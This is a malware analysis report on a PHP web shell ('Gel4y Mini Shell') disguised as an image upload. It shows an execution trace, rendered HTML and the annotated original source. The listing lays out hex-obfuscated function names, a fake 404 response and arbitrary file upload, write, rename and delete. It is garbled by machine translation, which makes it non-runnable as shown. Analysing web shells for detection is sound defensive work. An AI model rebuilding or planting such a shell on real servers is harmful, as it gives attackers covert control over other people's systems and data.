PHP Malware Analysis

gelay.php.jpg

md5: 38023475d26bdab4b7e6ce07ddd672c8


Deobfuscated PHP code

Failed to deobfuscate code

Execution traces

data/traces/38023475d26bdab4b7e6ce07ddd672c8_trace-1676246208.5715.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:57:14.469298]
1	0	1	0.000165	393528
1	3	0	0.000257	411256	{main}	1		/var/www/html/uploads/gelay.php.jpg	0	0
1	3	1	0.000285	411600
1	4	0	0.000294	411632	Error->__toString	0		Unknown	0	0
2	5	0	0.000307	411712	Error->getTraceAsString	0		Unknown	0	0
2	5	1	0.000320	411968
2	5	R			'#0 {main}'
1	4	1	0.000337	412264
1	4	R			'Error: Call to undefined function hex() in /var/www/html/uploads/gelay.php.jpg:95\nStack trace:\n#0 {main}'
			0.000401	333784
TRACE END   [2023-02-12 21:57:14.469569]


Generated HTML code

<html lang="en"><head></head><body style="background-color: # 000; color: #fff; font-family: serif;">swal ({title: \" {$ status} \ ", text: \" {$ msg} \ ", icon: \" {$ status} \ "}). lalu ((btnClick) =&gt; {if (btnClick) {document.location.href = \ "? p =". hex ($ p). $ loc. "\"}})  ";
}
function deldir ($ d) {
	global $ func;
	if (trim (pathinfo ($ d, PATHINFO_BASENAME), '.') === '') return;
	jika ($ func [6] ($ d)) {
		array_map ("deldir", glob ($ d. DIRECTORY_SEPARATOR. '{,.} *', GLOB_BRACE | GLOB_NOSORT));
		rmdir ($ d);
	} lain {
		batalkan tautan ($ d);
	}
}
?&gt;
<!-- doctype html-->
<!-- - RandsX aka T1kus_g0t --->


	<meta name="theme-color" content="red">
	<meta name="viewport" content="width = device-width, initial-scale = 0,60, shrink-to-fit = no">
	<link rel="stylesheet" href="// cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
	<link rel="stylesheet" href="// cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<title> &lt;? = self?&gt; </title>
	<style> .table-hover tbody tr: hover td {background: red} .table-hover tbody tr: hover td> * {color: #fff} .table> tbody> tr> * {color: #fff; vertical- align: middle} .form-control {background: 0 0! important; color: #fff! important; border-radius: 0} .form-control :: placeholder {color: #fff; opacity: 1} li {font- size: 18px; margin-left: 6px; list-style: none} a {color: #fff} </style>
	<script src="// unpkg.com/sweetalert/dist/sweetalert.min.js"> </script>


	<div class="bg-dark table-responsive text-light border">
		<div class="d-flex justify-content-between p-1">
			<div> <h3 class="mt-2"> <a href="?"> <!--? = self?--> </a> </h3> </div>
			<div>
				<span> Versi PHP: <!--? = $ func [1] ()?--> </span> <br>
				</div></div></div></body></html>

Original PHP code

<? php
// Analyst notes: the listing below is kept verbatim, including the machine-translated
// keywords ("definisikan", "untuk", "lain", "$ _ DAPATKAN" for define/for/else/$_GET) that make
// this copy non-runnable as shown. Comments describe what the original shell does.
//
// Hides every PHP diagnostic and answers with HTTP 404, so the file looks like a missing page
// to anyone probing it while still rendering its UI. A script that both suppresses errors and
// forces a 404 from an upload directory is itself a useful detection signal.
error_reporting (0);
http_response_code (404);
// Shell banner constant. The escaped string appears intended to decode to "Gel4y Mini Shell"
// (\x65 = 'e', octal \64 = '4'), matching the sample's file name.
definisikan ("diri", "G \ x65l \ 64y M \ x69n \ x69 Sh \ x65ll");
// "scandir" with hex escapes; used later as a variable-function name ($ scD ($ p)).
$ scD = "s \ x63 \ x61 \ x6e \ x64 \ x69r";
// Table of PHP builtin names stored as hex so plain-text signatures for them do not match
// the file. Decoded in order (index: name):
//   0 php_uname, 1 phpversion, 2 getcwd, 3 chdir, 4 preg_split, 5 array_diff, 6 is_dir,
//   7 is_file, 8 is_writable, 9 is_readable, 10 filesize, 11 copy, 12 file_exists,
//   13 file_put_contents, 14 file_get_contents, 15 mkdir, 16 rename, 17 strtotime,
//   18 htmlspecialchars, 19 date, 20 filemtime.
// Entries 2 and 19 carry stray dots from the page's formatting; the digits decode as listed.
// The variable is written as "$ Func" here and "$ func" below — a capitalisation artifact of
// the translated copy (PHP variable names are case-sensitive).
$ Func = array ( "7068705f756e616d65", "70687076657273696f6e", "676.574.637.764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", " 636f7079" , "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64.617.465", "66696c656d74696d65");
// Decodes each entry in place with nhx(); afterwards every $ func [i] (...) call in the file is
// a variable-function call to the corresponding builtin.
untuk ($ i = 0; $ i <count ($ func); $ i ++) {
	$ func [$ i] = nhx ($ func [$ i]);
}
// Working directory is taken straight from the request ("p", hex-encoded) and handed to
// chdir() ($ func [3]) without any validation, so the browser pane can be pointed at any
// directory the web-server user can read. Falls back to getcwd() ($ func [2]) when "p" is absent.
if (isset ($ _ DAPATKAN ["p"])) {
	$ p = nhx ($ _ DAPATKAN ["p"]);
	$ func [3] (nhx ($ _ DAPATKAN ["p"]));
} lain {
	$ p = $ func [2] ();
}
// Hex-encodes a byte string: for each byte, appends dechex(ord(byte)) to the result.
// Note that dechex() is not zero-padded, so a byte below 0x10 yields a single hex digit,
// which the pair-wise decoder nhx() below cannot realign. The shell uses this to build its
// "?p=", "&a=" and "&n=" link parameters, so paths and file names never appear in clear in
// URLs — long hex-only query strings in access logs are the corresponding artefact to hunt for.
// "untuk" / "mengembalikan" are the translated for / return keywords.
function hex ($ str) {
	$ r = "";
	untuk ($ i = 0; $ i <strlen ($ str); $ i ++) {
		$ r. = dechex (ord ($ str [$ i]));
	}
	mengembalikan $ r;
}
// Decodes a hex string back to bytes, two characters at a time (inverse of hex() above).
// The loop bound is strlen - 1, so an empty or single-character input yields "" and, for an
// odd-length input, the trailing character is ignored. hexdec() silently skips non-hex
// characters, so malformed input does not raise an error.
// Used to decode the $ func name table and every hex-encoded request parameter ("p", "a", "n").
function nhx ($ str) {
	$ r = "";
	$ len = (strlen ($ str) -1);
	untuk ($ i = 0; $ i <$ len; $ i + = 2) {
		$ r. = chr (hexdec ($ str [$ i]. $ str [$ i + 1]));
	}
	mengembalikan $ r;
}
// Renders fileperms($f) as an "ls -l"-style 10-character mode string: a file-type letter
// followed by owner/group/other rwx triplets. "perms fungsi" is the translated "function perms".
// The type tests must run in this order because the type bits overlap (e.g. 0xC000 socket
// contains both 0x8000 and 0x4000): s socket, l symlink, - regular, b block, d directory,
// c character device, p fifo, u unknown.
// NOTE(review): fileperms() returns false on failure; this code does no check, so presumably
// such an entry renders as "u---------".
perms fungsi ($ f) {
	$ p = fileperms ($ f);
	if (($ p & 0xC000) == 0xC000) {
		$ i = 's';
	} elseif (($ p & 0xA000) == 0xA000) {
		$ i = 'l';
	} elseif (($ p & 0x8000) == 0x8000) {
		$ i = '-';
	} elseif (($ p & 0x6000) == 0x6000) {
		$ i = 'b';
	} elseif (($ p & 0x4000) == 0x4000) {
		$ i = 'd';
	} elseif (($ p & 0x2000) == 0x2000) {
		$ i = 'c';
	} elseif (($ p & 0x1000) == 0x1000) {
		$ i = 'p';
	} lain {
		$ i = 'u';
	}
	// Owner triplet; the execute slot shows s/S when the setuid bit (0x0800) is set.
	$ i. = (($ p & 0x0100)? 'r': '-');
	$ i. = (($ p & 0x0080)? 'w': '-');
	$ i. = (($ p & 0x0040)? ​​(($ p & 0x0800)? 's': 'x'): (($ p & 0x0800)? 'S': '-'));
	// Group triplet; s/S for the setgid bit (0x0400).
	$ i. = (($ p & 0x0020)? 'r': '-');
	$ i. = (($ p & 0x0010)? 'w': '-');
	$ i. = (($ p & 0x0008)? (($ p & 0x0400)? 's': 'x'): (($ p & 0x0400)? 'S': '-'));
	// Other triplet; t/T for the sticky bit (0x0200).
	$ i. = (($ p & 0x0004)? 'r': '-');
	$ i. = (($ p & 0x0002)? 'w': '-');
	$ i. = (($ p & 0x0001)? (($ p & 0x0200)? 't': 'x'): (($ p & 0x0200)? 'T': '-'));
	mengembalikan $ i;
}
// Emits a SweetAlert popup and, once dismissed, redirects the browser back to the current
// directory ("?p=" . hex($p)) with the optional extra query fragment $loc appended.
// $sts == 1 selects the "sukses" (success) title/icon, anything else "kesalahan" (error).
// $msg and $loc are interpolated into inline JavaScript without any escaping.
// "fungsi" is the translated "function"; "lalu" inside the string is the translated ".then".
fungsi a ($ msg, $ sts = 1, $ loc = "") {
	global $ p;
	$ status = (($ sts == 1)? "sukses": "kesalahan");
	echo "<script> swal ({title: \" {$ status} \ ", text: \" {$ msg} \ ", icon: \" {$ status} \ "}). lalu ((btnClick) => {if (btnClick) {document.location.href = \ "? p =". hex ($ p). $ loc. "\"}}) </script> ";
}
// Recursively deletes a path. The first guard returns early when the basename consists only
// of dots (i.e. "." / ".."), which stops the recursion from climbing out of the tree.
// $ func [6] is the decoded is_dir: for a directory, every entry including dot-files is
// matched by the brace pattern "{,.}*" with GLOB_BRACE, deleted via array_map("deldir", ...),
// then the directory itself is removed; anything else is unlink()ed.
// "jika" / "lain" / "batalkan tautan" are the translated if / else / unlink.
function deldir ($ d) {
	global $ func;
	if (trim (pathinfo ($ d, PATHINFO_BASENAME), '.') === '') return;
	jika ($ func [6] ($ d)) {
		array_map ("deldir", glob ($ d. DIRECTORY_SEPARATOR. '{,.} *', GLOB_BRACE | GLOB_NOSORT));
		rmdir ($ d);
	} lain {
		batalkan tautan ($ d);
	}
}
?>
<! doctype html>
<! - RandsX aka T1kus_g0t ->
<html lang = "en">
<head>
	<meta name = "theme-color" content = "red">
	<meta name = "viewport" content = "width = device-width, initial-scale = 0,60, shrink-to-fit = no">
	<link rel = "stylesheet" href = "// cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
	<link rel = "stylesheet" href = "// cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<title> <? = self?> </title>
	<style> .table-hover tbody tr: hover td {background: red} .table-hover tbody tr: hover td> * {color: #fff} .table> tbody> tr> * {color: #fff; vertical- align: middle} .form-control {background: 0 0! important; color: #fff! important; border-radius: 0} .form-control :: placeholder {color: #fff; opacity: 1} li {font- size: 18px; margin-left: 6px; list-style: none} a {color: #fff} </style>
	<script src = "// unpkg.com/sweetalert/dist/sweetalert.min.js"> </script>
</head>
<body style = "background-color: # 000; color: #fff; font-family: serif;">
	<div class = "bg-dark table-responsive text-light border">
		<div class = "d-flex justify-content-between p-1">
			<div> <h3 class = "mt-2"> <a href="?"> <? = self?> </a> </h3> </div>
			<div>
				<span> Versi PHP: <? = $ func [1] ()?> </span> <br>
				<a href="?p=<?= hex($p)."&a=".hex("newFile") ?> "> + File </a>
				<a href="?p=<?= hex($p)."&a=".hex("newDir") ?> "> + Direktori </a>
			</div>
		</div>
		<div class = "border-top table-responsive">
			<li> Server: <? = "{$ _SERVER [" SERVER_NAME "]} ({$ _SERVER [" SERVER_ADDR "]} / {$ _ SERVER [" REMOTE_ADDR "]})"?> </li>
		</div>
		<form method = "post" enctype = "multipart / form-data"> <div class = "input-group mb-1 px-1 mt-1"> <div class = "custom-file"> <input type = "file" name = "f []" class = "custom-file-input" onchange = "this.form.submit ()" multiple> <label class = "custom-file-label rounded-0 bg-transparent text- light "> Pilih file </label> </div> </div> </form>
		<? php
			// Upload handler: for each file posted under "f[]", $ func [11] (the decoded copy())
			// copies the temporary upload to the client-supplied file name, relative to the
			// directory chdir()ed to earlier. There is no extension, type or size check, so this
			// is an arbitrary file write as the web-server user. ("nama" is the translated
			// $_FILES [...] ["name"] key.)
			if (isset ($ _ FILES ["f"])) {
				$ n = $ _FILES ["f"] ["nama"];
				untuk ($ i = 0; $ i <count ($ n); $ i ++) {
					if ($ func [11] ($ _ FILES ["f"] ["tmp_name"] [$ i], $ n [$ i])) {
						a ("file berhasil diunggah");
					} lain {
						a ("file gagal diunggah", 0);
					}
				}
			}
			// Download branch: only sets response headers here (names garbled by translation:
			// "Jenis-Konten" = Content-Type, "Panjang-Konten" = Content-Length, "Isi-disposisi" =
			// Content-Disposition). $ func [17] is the decoded strtotime, not filesize, so the
			// Content-Length value appears to be a bug in the sample. No call that streams the
			// file body is visible on this page.
			if (isset ($ _ GET ["download"])) {
				header ("Jenis-Konten: application / octet-stream");
				header ("Content-Transfer-Encoding: Binary");
				header ("Panjang-Konten:". $ func [17] (nhx ($ _ DAPATKAN ["n"])));
				header ("Isi-disposisi: lampiran; namafile = \" ". nhx ($ _ DAPATKAN [" n "])." \ "");
			}
		?>
	</div>
	<div class = "bg-dark border table-responsive-sm mt-2">
		<div class = "ml-2" style = "font-size: 18px;">
			<span> Jalur: </span>
			<? php
			$ ps = $ func [4] ("/ (\\\ | \ /) /", $ p);
			foreach ($ ps sebagai $ k => $ v) {
				jika ($ k == 0 && $ v == "") {
					echo "<a href=\"?p=2f\"> ~ </a> /"; terus;
				}
				if ($ v == "") lanjutkan;
				echo "<a href = \"? p = ";
				untuk ($ i = 0; $ i <= $ k; $ i ++) {
					echo hex ($ ps [$ i]);
					jika ($ i! = $ k) echo "2f";
				}
				echo "\"> {$ v} </a> / ";
			}
			?>
		</div>
	</div>
	<article class = "bg-dark border table-responsive-sm mt-2">
		<? php if (! isset ($ _ GET ["a"])):?>
		<table class = "table-hover table-bordered table-sm">
			<thead class = "text-light">
				<tr>
					<th> Nama </th>
					<th> Ukuran </th>
					<th> Izin </th>
					<th> Tindakan </th>
				</tr>
			</thead>
			<tbody class = "text-light">
				<? php
				$ scD = $ func [5] ($ scD ($ p), [".", ".."]);
				foreach ($ scD sebagai $ d) {
					if (! $ func [6] ("$ p / $ d")) lanjutkan;
					echo "
					<tr>
						<td> <a href = \ "? p =". hex ("$ p / $ d"). "\" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ " Modifikasi terbaru pada ". $ Func [19] (" Ymd H: i ", $ func [20] (" $ p / $ d "))." \ "> <I class = \" fa fa-fw fa- folder \ "> </i> {$ d} </a> </td>
						<td> T / A </td>
						<td> <font color = \ "". (($ func [8] ("$ p / $ d"))? "# 00ff00": (! $ func [9] ("$ p / $ d") ? "red": null)). "\"> ". perms (" $ p / $ d ")." </font> </td>
						<td>
							<a href = \ "? p =". hex ($ p). "& a =". hex ("rename"). "& n =". hex ($ d). "& t = d \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Ganti nama \"> <i class = \ "fa fa-fw fa-pencil \"> </i> </a>
							<a href = \ "? p =". hex ($ p). "& a =". hex ("delete"). "& n =". hex ($ d). "\" class = \ "delete \" data-type = \ "folder \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Hapus \"> <i class = \ "fa fa-fw fa-trash \" > </i> </a>
						</td>
					</tr> ";
				}
				foreach ($ scD sebagai $ f) {
					if (! $ func [7] ("$ p / $ f")) lanjutkan;
					$ size = $ func [10] ("$ p / $ f") / 1024;
					$ size = round ($ size, 3);
					$ size = ($ size> 1024)? bulat ($ size / 1024, 2). "MB": $ size. "KB";
					echo "
					<tr>
						<td> <a href = \ "? p =". hex ($ p). "& a =". hex ("view"). "& n =". hex ($ f). "\" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Modifikasi terbaru pada". $ func [19] ("Ymd H: i", $ func [20] ("$ p / $ f") ). "\"> <i class = \ "fa fa-fw fa-file \"> </i> {$ f} </a> </td>
						<td> {$ size} </td>
						<td> <font color = \ "". (($ func [8] ("$ p / $ f"))? "# 00ff00": (! $ func [9] ("$ p / $ f") ? "red": null)). "\"> ". perms (" $ p / $ f ")." </font> </td>
						<td>
							<div class = \ "d-flex justify-content-between \">
									<a href = \ "? p =". hex ($ p). "& a =". hex ("edit"). "& n =". hex ($ f). "\" data-toggle = \ "tooltip \ "data-placement = \" auto \ "title = \" Edit \ "> <i class = \" fa fa-fw fa-edit \ "> </i> </a>
									<a href = \ "? p =". hex ($ p). "& a =". hex ("rename"). "& n =". hex ($ f). "& t = f \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Ganti nama \"> <i class = \ "fa fa-fw fa-pencil \"> </i> </a>
									<a href = \ "? p =". hex ($ p). "& n =". hex ($ f). "& download". "\" data-toggle = \ "tooltip \" data-placement = \ " auto \ "title = \" Unduh \ "> <i class = \" fa fa-fw fa-download \ "> </i> </a>
									<a href = \ "? p =". hex ($ p). "& a =". hex ("delete"). "& n =". hex ($ f). "\" class = \ "delete \" data-type = \ "file \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Hapus \"> <i class = \ "fa fa-fw fa-trash \" > </i> </a>
							</div>
						</td>
					</tr>
					";
				}
				?>
			</tbody>
		</table>
		<? php else: /* Action dispatcher: when "a" is present the hex-decoded value selects one of the
		   handlers below (delete / newDir / newFile / rename / edit / view). "$ _ DAPATKAN" is the
		   translated $_GET. */ if (isset ($ _ DAPATKAN ["a"])) $ a = nhx ($ _ DAPATKAN ["a"]); ?>
		<div class = "px-2 py-2">
			<? php if ($ a == "hapus") {
				// Delete handler. "hapus" is the translated "delete" (the listing links send
				// hex("delete")), and "jika" / "lain" / "batalkan tautan" are if / else / unlink.
				// The target is "$p/<n>" with "n" hex-decoded from the query; "t" selects
				// directory ("d", recursive deldir) or file ("f", unlink). Success is reported by
				// re-checking with $ func [12] (the decoded file_exists) after the deletion.
				$ loc = $ p. '/'. nhx ($ _ DAPATKAN ["n"]);
				jika ($ _GET ["t"] == "d") {
					deldir ($ loc);
					if (! $ func [12] ($ loc)) {
						a ("folder berhasil dihapus");
					} lain {
						a ("gagal menghapus folder", 0);
					}
				}
				jika ($ _GET ["t"] == "f") {
					$ loc = $ p. '/'. nhx ($ _ DAPATKAN ["n"]);
					batalkan tautan ($ loc);
					if (! $ func [12] ($ loc)) {
						a ("file berhasil dihapus");
					} lain {
						a ("file untuk menghapus folder", 0);
					}
				}
			}
			?>
			<? php if ($ a == "newDir"):?>
			<h5 class = "border p-1 mb-3"> Folder baru </h5>
			<form method = "post"> <div class = "form-group"> <label for = "n"> Nama: </label> <input name = "n" id = "n" class = "form-control "autocomplete =" off "> </div> <div class =" form-group "> <button type =" submit "name =" s "class =" btn btn-outline-light rounded-0 "> Buat </ tombol> </div> </form>
			<? php /* newDir handler: on submit, $ func [12] (file_exists) rejects a name already present,
			   otherwise $ func [15] (mkdir) creates "$p/<POSTed n>". The "file baru" branch that follows
			   is the translated "newFile" action. */ ((isset ($ _ POST ["s"]))? ($ func [12] ("$ p / {$ _ POST [" n "]}")? a ("nama folder telah digunakan", 0, "& a =". Hex ("newDir")): ($ func [15] ("$ p / {$ _ POST [" n "]}")? A ("folder berhasil dibuat"): a (" folder gagal dibuat ", 0))): null); elseif ($ a == "file baru"):?>
			<h5 class = "border p-1 mb-3"> File baru </h5>
			<form method = "post"> <div class = "form-group"> <label for = "n"> Nama file: </label> <input type = "text" name = "n" id = "n" class = "form-control" placeholder = "hack.txt"> </div> <div class = "form-group"> <label for = "ctn"> Konten: </label> <textarea style = "resize: none "name =" ctn "id =" ctn "cols =" 30 "baris =" 10 "class =" form-control "placeholder =" # Stamped By Me "> </textarei> </div> <div class = "form-group"> <button type = "submit" name = "s" class = "btn btn-outline-light rounded-0"> Buat </button> </div> </form>
			<? php /* newFile handler: after the $ func [12] (file_exists) check, $ func [13]
			   (file_put_contents) writes the POSTed "ctn" body to "$p/<POSTed n>" — an arbitrary file
			   write under the web-server user, then redirects to the view action. "ganti nama" in the
			   next branch is the translated "rename". */ ((isset ($ _ POST ["s"]))? ($ func [12] ("$ p / {$ _ POST [" n "]}")? a ("nama file telah digunakan", 0, "& a =". Hex ("newFile")): ($ func [13] ("$ p / {$ _ POST [" n "]}", $ _POST ["ctn"])? A ("file berhasil dibuat ", 1," & a = ". hex (" view ")." & n = ". hex ($ _ POST [" n "])): a (" file gagal dibuat ", 0))): null ); elseif ($ a == "ganti nama"):?>
			<h5 class = "border p-1 mb-3"> Ganti nama <? = (($ _GET ["t"] == "d")? "folder": "file")?> </h5>
			<form method = "post"> <div class = "form-group"> <label for = "n"> Nama: </label> <input type = "text" name = "n" id = "n" class = "form-control" value = "<? = nhx ($ _ GET [" n "])?>"> </div> <div class = "form-group"> <button type = "submit" name = " s "class =" btn btn-outline-light rounded-0 "> Simpan </button> </div> </form>
			<? php /* rename handler: $ func [16] (rename) moves "$p/<hex-decoded n>" to the raw POSTed
			   "n", which is resolved relative to the chdir()ed directory, so the destination is not
			   confined to the current folder. */ ((isset ($ _ POST ["s"]))? ($ func [16] ($ p. '/'. nhx ($ _ DAPATKAN ["n"]), $ _POST ["n"]) ? a ("berhasil mengubah nama folder"): a ("gagal mengubah nama folder", 0)): null); elseif ($ a == "edit"):?>
			<h5 class = "border p-1 mb-3"> Edit file </h5>
			<span> Nama file: <? = nhx ($ _ GET ["n"])?> </span>
			<form method = "post"> <div class = "form-group"> <label for = "ctn"> Konten: </label> <textarea name = "ctn" id = "ctn" cols = "30" baris = "10" class = "form-control"> <? = $ Func [18] ($ func [14] ($ p. '/'. Nhx ($ _ DAPATKAN ["n"])))?> </ textarea> </div> <div class = "form-group"> <button type = "submit" name = "s" class = "btn btn-outline-light rounded-0"> Simpan </button> </ div > </form>
			<? php /* edit handler: $ func [13] (file_put_contents) overwrites "$p/<hex-decoded n>" with the
			   POSTed "ctn" body. The failure branch calls a() without a status argument, so it is shown
			   with the success icon. */ ((isset ($ _ POST ["s"]))? ($ func [13] ($ p. '/'. nhx ($ _ DAPATKAN ["n"]), $ _POST ["ctn"]) ? a ("konten file berhasil diubah", 1, "& a =". hex ("view"). "& n = {$ _ GET [" n "]}"): a ("konten file gagal diubah")) : null); elseif ($ a == "view"):?>
			<h5 class = "border p-1 mb-3"> Lihat file </h5>
			<span> Nama file: <? = nhx ($ _ GET ["n"])?> </span>
			<div class = "form-group"> <label for = "ctn"> Konten: </label> <textarea name = "ctn" id = "ctn" cols = "30" row = "10" class = "form -control "readonly> <? = $ func [18] ($ func [14] ($ p. '/'. nhx ($ _ GET [" n "])))?> </textarei> </div>
			<? php endif; ?>
		</div>
		<? php endif; ?>
	</article>
	<div class = "bg-dark border text-center mt-2">
		<small> Hak Cipta & copy; 2021 - Didukung oleh Darknet Indonesia </small>
	</div>
	<script src = "// code.jquery.com/jquery-3.5.1.slim.min.js"> </script>
	<script src = "// cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js"> </script>
	<script src = "// cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"> </script>
	<script> eval (fungsi (p, a, c, k, e, d) {e = function (c) {return (c <a? '': e (parseInt (c / a))) + ((c = c% a)> 35? String.fromCharCode (c + 29): c.toString (36))}; if (! ''. replace (/ ^ /, String)) {while (c -) {d [e (c)] = k [c] || e (c)} k = [fungsi (e) {kembalikan d [e]}]; e = fungsi () {return '\\ w +'}; c = 1}; sementara (c -) {if (k [c]) {p = p.replace (RegExp baru ('\\ b' + e (c) + '\\ b', 'g'), k [c])}} kembali p} ('En (); $ (\' [2-m = "4"] \ '). 4 (); $ (". l"). k (j (e) {mis. (); h 0 = $ (6) .5 ("2-0"); c ({b: "a", 9: "oiq?", w: "D" +0+ "p CB" , A: 7, z: 7,}). Y ((8) => {r (8) {x 1 = $ (6) .5 ("3") + "& t =" + ((0 == "v")? "d": "f"); us3 = 1}})}); ', 41,41,'ketik | buildURL | data | href | tooltip | attr | ini | benar | akanDelete | judul | peringatan | ikon | swal ||i>i> preventDefault | biarkan | Anda | fungsi | klik | hapus | toggle | init | Are | akan | yakin | jika | lokasi || dokumen | folder | teks | const | kemudian | hazardMode | tombol | dihapus | menjadi | Ini | bsCustomFileInput'.split ('|'), 0, {})) </script>
</ Body>
</html>